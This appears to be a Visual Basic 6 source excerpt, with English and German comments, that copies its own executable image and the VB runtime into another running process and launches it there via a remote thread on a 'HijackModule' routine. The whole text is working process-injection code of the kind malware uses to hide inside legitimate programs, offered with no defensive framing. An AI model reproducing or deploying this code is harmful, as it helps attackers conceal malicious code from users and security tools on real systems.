Public Sub Main()
' Sub that will start when the program is run
Dim pid As Long, ProcessHandle As Long
Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule _
  As Long
Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As _
IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER
Dim ExeVariable As Long
 
' Get the EXE name
GetModuleFileName 0, szFileName, 261
 
' Get the PID of the program. Note that it must be running in memory (open it)
' sztarget eine konstante die den namen des prozesses enthält in den 
' hineinkopiert werden soll
 
' search process sucht die zugehörige th32ProcessID
pid = searchProcess(szTarget)
 
' Open the process and give us full access, we need this to hijack it
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, pid)
 
' Get the memory location of where our code starts in memory, this will 
' correspond to the /BASE: switch that you put in the linker options using 
' compile controller
'  ^ obriger komentar erscheint seltsam.. es geht nur darum das mit einer 
' spezielen funktion beim kompilieren eine art pointer in die exe gesetzt wird. 
' dieser wird jetzt gesucht und somit die position unseres programmes wiedergibt
Module = GetModuleHandleA(vbNullString)
 
' Load the code's header into the DosHeader Type
CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)
 
' e_lfanew is the starting address of the PE Header in memory. Add this value 
' to the length of the fileheader as well as to the length of the optional 
' header
' These headers are the founding blocks of any executable file, wether in 
' memory or on disk.
CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + _
  Len(TImageFileHeader)), Len(PImageOptionalHeader)
 
' After adding all those lengths, we will get the final size of the executable 
' in memory, this is usually a bit more then the size on disk
' die Größe unserer Datei im ram
Size = PImageOptionalHeader.SizeOfImage
 
' zur sicherheit Platzt im ram freiräumen
' Just to make sure, free the memory in the program at the location of our exe
VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE
 
 
' Allocate the size of our exe in memory of the program, at the location of 
' where our exe is in memory
NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or _
  MEM_COMMIT, PAGE_EXECUTE_READWRITE)
 
' Copy our exe into program's memory
WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, _
  BytesWritten
 
' Copy the EXE name
ExeVariable = VirtualAllocEx(ProcessHandle, 0, 261, MEM_RESERVE Or MEM_COMMIT, _
  PAGE_EXECUTE_READWRITE)
WriteProcessMemory ProcessHandle, ByVal ExeVariable, ByVal szFileName, 261, _
BytesWritten
 
' das ganze nochma von vorn für die runtime
' Copy VB Runtime to EXE memory (same code as to copy our EXE, so I won't _
  comment it again.
Dim VBMod As Long, VBSize As Long, VBNewMod As Long
VBMod = GetModuleHandleA("msvbvm60.dll")
CopyMemory PImageDosHeader, ByVal VBMod, Len(PImageDosHeader)
CopyMemory PImageOptionalHeader, ByVal (VBMod + PImageDosHeader.e_lfanew + 4 + _
  Len(TImageFileHeader)), Len(PImageOptionalHeader)
VBSize = PImageOptionalHeader.SizeOfImage
VBNewMod = VirtualAllocEx(ProcessHandle, VBMod, VBSize, MEM_RESERVE Or _
  MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory ProcessHandle, ByVal VBNewMod, ByVal VBMod, VBSize, _
BytesWritten
 
' Create our remote thread
' jetzt der thread dessen befehle in der public function hijackmodule stehen
CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf _
  HijackModule), ByVal ExeVariable, 0, TID
ExitProcess 0
End Sub